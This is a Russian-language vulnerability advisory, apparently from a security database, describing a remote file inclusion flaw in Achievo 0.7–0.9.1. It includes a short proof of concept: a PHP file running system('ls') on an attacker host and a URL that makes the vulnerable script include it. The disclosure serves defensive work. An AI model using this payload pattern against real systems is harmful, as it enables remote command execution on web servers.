| Дата публикации: | 27.08.2002 |
| Всего просмотров: | 1109 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Achieva (http://www.achievo.org/) включает PHP сценарий, который используется для генерации JavaScript (class.atkdateattribute.js.php). Этот сценарий использует множество PHP include_once() инструкций, чтобы вызвать код, содержащийся в функциональных библиотеках. Нападающие могут изменять переменную $config_atkroot, которая определяет местоположение внешних файлов, и определять произвольное местоположение, типа PHP сценария на удаленном хосте. Успешная эксплуатация уязвимости позволяет удаленному атакующему выполнять команды с привилегиями процесса Web сервера. Пример: 1. Создаем файл ls.txt и сохраняем его на своем Web сервере:
<?php system('ls'); ?>
2. Вызываем уязвимый сценарий:
http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt?Уязвимость обнаружена в Achieva 0.7-0.9.1 |
| Ссылки: | Arbitrary code execution problem in Achievo |